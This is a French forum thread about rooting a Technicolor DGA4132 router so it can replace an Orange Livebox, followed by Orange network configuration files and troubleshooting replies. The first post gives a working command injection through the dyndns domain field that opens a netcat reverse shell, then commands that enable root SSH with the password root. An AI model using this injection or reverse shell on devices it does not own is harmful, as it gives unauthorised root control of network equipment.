Auteur Sujet: Remplacer sa Livebox par un Technicolor DGA4132 rooté (Lu 79893 fois)

cetipabo · « **le:** 06 janvier 2018 à 21:47:00 »

Bonjour,
on vient de trouver une faille dans l'interface web du technicolor DGA4132 qui permet de le rooter.

Le DGA4132 c'est le tout dernier modem/routeur xDSL de l'opérateur italien TIM, il est muni d'un port SFP:
https://www.hwupgrade.it/forum/showthread.php?t=2823001
il est préfconfiguré pour fonctionner qu'avec l'opérateur TIM, mais une fois qu'on a pris le Control, on fait ce qu'on veut, c'est de l'openwrt dedans

Chipset: BroadCom 63138 (ARM A9 Dual Core 1GHz)*
Wi-Fi: Quantenna QT3840BC + QT25188*
2.4 GHz 300 Mbps (2x2 MIMO) IEEE 802.11n AP - 20/40 MHz
5 GHz 1733 Mbps (4x4 MU-MIMO) IEEE 802.11ac AP - 20/40/80 MHz - beamforming
Port USB: 2 x 3.0
Port LAN: 4 x Gbit, dont un WAN ou LAN
Port SFP pour FTTH

on le trouve à 48€ sur Ebay et Amazon :
https://www.amazon.fr/Modem-routeur-ADSL2-jusquà-000-mégaoctets/dp/B00AT8MKYC

Pour le rooter il suffit d'aller dans Wan services

et dans le champ du domaine dyndns, mettre : test.com;nc 192.168.1.10 1337 -e /bin/sh &
192.168.1.10 etant l'ip de votre PC
1337 le port à utiliser

Sur son PC, il faudra lancer auparavant dans un shell la commande : nc -lvvp 1337
et hop on a l'accés root

Donc une fois ceci fait on va activer SSH :

Code: [Sélectionner]

sed -i 's/0/1/' /etc/config/dropbear
sed -i 's/off/on/' /etc/config/dropbear
sed -i 's#root:/bin/false#root:/bin/ash#' /etc/passwd

puis on relance dropbear :

Code: [Sélectionner]

/etc/init.d/dropbear restart
Voilà, on peut maintenant accéder au modem/router en SSH, avec le user/pass : root/root

Il ne reste plus qu'à paramétrer son /etc/config/network pour le réseau Orange (remplacer les xxxxx et les zzzzzz avec vos données):

Code: [Sélectionner]

config interface 'loopback'
    option ifname 'lo'
    option proto 'static'
    option ipaddr '127.0.0.1'
    option netmask '255.0.0.0'

config globals 'globals'
    option default_ps '0'

config device 'waneth4'
    option type '8021q'
    option name 'waneth4'
    option macaddr 'xx:xx:xx:xx:xx:xx'
    option ifname 'eth4'
    option vid '835'
    option ipv6 '0'

config device 'wanptm0'
    option type '8021q'
    option name 'wanptm0'
    option macaddr 'xx:xx:xx:xx:xx:xx'
    option vid '832'
    option mtu '1500'
    option ipv6 '0'

config interface 'wan'
    option ifname 'ptm0.832'
    option proto 'dhcp'
    option peerdns '1'
    option broadcast '1'
    option vendorid 'sagem'
    option reqopts '1 3 6 15 28 51 58 59 90 119 120 125'
    option sendopts '0x4d:2b46535644534c5f6c697665626f782e496e7465726e65742e736f66746174686f6d652e4c697665626f7834 0x5a:0000000000000000000000zzzzzzzzzzzzzzzzzzzzzz'
    option mtu '1500'
    option auto '1'
    option ipv6 '0'

config interface 'replay'
    option ifname 'ptm0.838'
    option proto 'dhcp'
    option peerdns '1'
    option broadcast '1'
    option vendorid 'sagem'
    option reqopts '1 3 42 72 121'
    option sendopts '0x4d:2746535644534c5f6c697665626f782e4d4c54562e736f66746174686f6d652e4c697665626f7834 0x3d:01xxxxxxxxxxxx'
    option mtu '1500'

config interface 'tvorange'
    option proto 'static'
    option ifname 'ptm0.840'
    option ipaddr '192.168.255.254'
    option netmask '255.255.255.255'
    option gateway '192.168.255.254'

config interface 'wwan'
    option proto 'mobiled'
    option session_id '0'
    option profile '1'
    option auto '0'

config interface 'wan6'
    option proto 'dhcpv6-pd'
    option noslaaconly '1'
    option iface_464xlat '0'
    option dns_metric '20'
    option auto '1'
    option ifname '@wan_ipv6'

config interface 'lan'
    option type 'bridge'
    option proto 'static'
    option ipaddr '192.168.1.1'
    option netmask '255.255.255.0'
    option force_link '0'
    option ifname 'eth0 eth1 eth2 eth3 eth5'
    list pppoerelay 'wanptm0'
    option mtu '1500'
    option ip6assign '0'
    option ipv6 '0'

config switch 'bcmsw'
    option reset '1'
    option enable_vlan '0'
    option qosimppauseenable '0'
    option jumbo '1'

config interface 'wlnet_b_24'
    option proto 'static'
    option ip6assign '64'
    option ip6hint '1'
    option netmask '255.255.255.128'
    option ipaddr '192.168.168.1'
    option ifname 'wl0_1'
    option force_link '0'
    option name 'Guest24'
    option ipv6 '0'

config interface 'wlnet_b_5'
    option proto 'static'
    option ip6assign '64'
    option ip6hint '2'
    option netmask '255.255.255.128'
    option ipaddr '192.168.168.129'
    option ifname 'wl1_1'
    option force_link '0'
    option name 'Guest50'
    option ipv6 '0'

config device 'wlnet_b_5eth5'
    option type '8021q'
    option name 'wl1_1'
    option enabled '1'
    option ifname 'eth5'
    option vid '3'
    option ipv6 '0'

config interface 'sfp'
	option proto 'static'
	option ipaddr '192.168.2.2'
	option netmask '255.255.255.128'
	option ifname 'eth4'

À noter que moi je suis en VDSL, je n'utilise donc pas le port SFP.

Ensuite il suffit de suivre le tuto pour LEDE/Openwrt pour le firewall etc...
https://lafibre.info/remplacer-livebox/remplacement-de-la-livebox-par-un-routeur-lede-fork-dopenwrt/msg471749/#msg471749

Donc avec ca on a moyen d'avoir NET + TV + Replay. et probablement la téléphonie car on peut faire tourner asterisk dessus ?!

Nao · « **Réponse #1 le:** 06 janvier 2018 à 22:27:22 »

Si, c'est exactement le même que le DGA4130, je peux confirmer que c'est un très bon routeur.
C'est cool et en plus t'aura réussi à l'utiliser chez Orange ce DGA4132, finalement. Je dis ça par rapport à l'histoire qui avait eu sur le forum de hwupgrade.it.
(Oui, je me suis informé. ^^)

Vous avez fait du bon taf.

Du coup, est-ce que cette nouvelle faille peut concerner également tous les modems de Technicolor, en 16.3 et plus ?

Édit : L'avertissement sur Amazon : À utiliser sous la surveillance d’un adulte.

« **Réponse #2 le:** 06 janvier 2018 à 22:32:51 »

j'ai pas essayé la faille sur le DGA4130, mais en théorie je dirais que oui elle doit y etre, que ce soit sur 16.3 ou 17.x

Par contre, on me dit que sur le DGA4132 le firmware 1.0.5 n'a plus la faille. Mais bon vu que d'origine il est vendu en firmware 1.0.2 ou 1.0.3, ya pas de souci

Et aucun risque qu'il se mette a jour tout seul si on n'est pas sur le reseau TIM, l’accès a leur serveur d'update est refusé

Citation de: Nao le 06 janvier 2018 à 22:27:22

C'est cool et en plus t'aura réussi à l'utiliser chez Orange ce DGA4132, finalement. Je dis ça par rapport à l'histoire qui avait eu sur le forum de hwupgrade.it.
(Oui, je me suis informé. ^^)

LoL oui le gars qui avait raconté n'importe quoi m'avait mis en colère

mais je savais qu'un jour on trouverait une faille

cetipabo · « **Réponse #3 le:** 09 janvier 2018 à 15:11:56 »

Pour info un couteau suisse a été développé en python (compilé pour windows mais les sources sont livrées) pour exploiter les failles de l'interface web, afin de pouvoir très facilement rooter votre Modem technicolor DGA4130 ou DGA4132 ou autres...et d'upgrader/downgrader votre firmware si nécessaire.

A savoir que sur DGA4130 jusqu'au Firmware 1.0.3 : ODHCPC permet d'avoir NET + TV +Replay avec Orange en DHCP. A partir de la version 1.0.4 l'option DHCP 90 ne passe plus, mais vous pouvez écraser les fichiers ODHCPC* par ceux du firmware 1.0.3 et ca marche.

Sur le DGA4132, ca ne marche pas non plus, il faut aussi mettre les fichier ODHCPC* du firmware 1.0.3 du DGA4130. je les posterai dès que je suis chez moi.

Dans tous les cas quelque soit le modem et le firmware, la connexion PPPoe sur vlan 835 fonctionne toujours.

EDIT:
Voici les fichiers odhcpc à remplacer dans /usr/sbin/ :
(posté ci-dessous)
Vous avez toujours une copie des fichiers originaux dans /rom/usr/sbin donc vous pouvez les écraser sans soucis et revenir en arrière si necessaire.

renaud07 · « **Réponse #4 le:** 10 mars 2018 à 02:50:17 »

Je viens de commander le DGA4132 pour remplacer ma LB pro v2 qui commence à déconner (le wifi bug sans raison apparente, ça s'est arrangé après un reset mais ça n'a duré que quelques jours...). Pour 48€ on peut difficilement faire mieux.

Hâte de voir ce que le 63138 a dans le ventre côté synchro.

Et si la cage fonctionne avec le SFP sercomm, on aura trouvé le routeur ultime compatible orange le moins cher du marché

« **Réponse #5 le:** 10 mars 2018 à 11:48:53 »

Salut Renaud07

content de savoir que tu t'équipes d'un DGA4132

tu vas pas être déçu !
je me suis fait un petit wiki qui pourra te servir : https://wiki.dga4130.tk/

Par contre j'ai un souci de config depuis quelques temps, je n'ai plus de TV. internet et VOD sont OK. J'ai remis ma livebox 4 depuis.
je n'ai pas touché à ma config qui marchait très bien jusque là...j'ai vu dans d'autres discussions que certains avaient leur TV qui ne marchait plus et on réglé le problème en ajoutant des options DHCP ? https://lafibre.info/remplacer-livebox/tuto-edgerouter-erpro-8-pour-internet-livebox-dhcp-pour-tv-et-telephone/msg514784/#msg514784

zoc · « **Réponse #6 le:** 10 mars 2018 à 13:36:30 »

L'option a rajouter concerne ceux qui conservent la Livebox 4 derrière leur routeur perso (principalement pour le téléphone). Sans cette option (au niveau du serveur DHCP du routeur tiers donc), la livebox ne récupère effectivement plus d'adresse IP et aucun service n'est actif.

« **Réponse #7 le:** 10 mars 2018 à 14:13:31 »

ok...
c'est quand même bizarre que chez moi, sans avoir strictement rien changé dans une config qui marchait, et ceci sur plusieurs modem/routeurs, la TV ne passe plus... $:-\$

renaud07 · « **Réponse #8 le:** 10 mars 2018 à 16:27:59 »

Citation de: cetipabo le 10 mars 2018 à 11:48:53

Salut Renaud07 content de savoir que tu t'équipes d'un DGA4132 tu vas pas être déçu !
je me suis fait un petit wiki qui pourra te servir : https://wiki.dga4130.tk/

Génial ce wiki

renaud07 · « **Réponse #9 le:** 10 mars 2018 à 22:37:53 »

Je vois que sur le wiki tu flash la version 1.1.0 mais ce n'est pas indispensable, si ? Des améliorations notables par rapport à la 1.0.3 ?

Y'a plus qu'à espérer aussi que le multi-VC fonctionne : https://lafibre.info/remplacer-livebox/quel-modem-routeur-pour-remplacer-une-livebox-et-conserver-tout-les-services/msg252774/#msg252774

« **Réponse #10 le:** 10 mars 2018 à 22:49:58 »

du firmware 1.0.3 au 1.1.0 il n'y a pas de nouvelles fonctionnalités, si ce n'est des versions de packages plus à jour et corrections de bugs. C'est pas indispensable mais bon autant être à jour...

ben oui le multipvc fonctionne puisque je faisais tourner Internet + TV + VOD....jusqu'a ce que le flux tv ne passe plus...je suis pressé que tu le reçoives, a 2 on va bien trouver de quoi vient le problème, qui doit être tout con j'en suis sur...

Ma config WAN / VOD/ TV dans /etc/config/network

Code: [Sélectionner]

config interface 'wan'
	option ifname 'ptm0.832'
	option proto 'dhcp'
	option peerdns '1'
	option broadcast '1'
	option vendorid 'sagem'
	option reqopts '1 3 6 15 28 51 58 59 90 119 120 125'
	option sendopts '0x4D:2b46535644534c5f6c697665626f782e496e7465726e65742e736f66746174686f6d652e4c697665626f7834 0x5a:0000000000000000000000xxxxxxxxxxxxxxxxxxxxxx'
	option mtu '1500'
	list dns '80.10.246.2'
	list dns '80.10.246.129'
	option auto '1'

config interface 'replay'
	option ifname 'ptm0.838'
	option proto 'dhcp'
	list dns '80.10.246.2'
	list dns '80.10.246.129'
	option peerdns '1'
	option broadcast '1'
	option vendorid 'sagem'
	option reqopts '1 3 42 72 121'
	option sendopts '0x4D:2746535644534c5f6c697665626f782e4d4c54562e736f66746174686f6d652e4c697665626f7834 0x3D:xxxxxxxxxxxxxx'
	option mtu '1500'

config interface 'tvorange'
	option proto 'static'
	option ifname 'ptm0.840'
	option ipaddr '192.168.255.254'
	option netmask '255.255.255.255'
	option gateway '192.168.255.254'

renaud07 · « **Réponse #11 le:** 10 mars 2018 à 23:15:33 »

Pour le muti-VC je parle sur l'ADSL, pas le VDSL qui utilise les VLAN. Et pas de DHCP pour moi, je suis toujours sur un DSLAM ATM...

Mais en lisant le wiki d'openwrt, je vois que si on veut utiliser le PPPoE sur ADSL on est obligé de passer par atm-bridge :

Citer

Each atm-bridge section maps the specified ATM curcuit an atm# pseudo ethernet device which can be used for example in conjunction with pppoe to establish a DSL connection to the ISP.

Donc a priori ça devrait le faire.

Par contre je ne sais pas si je pourrais t'aider pour la partie TV vu que j'ai une offre sans TV...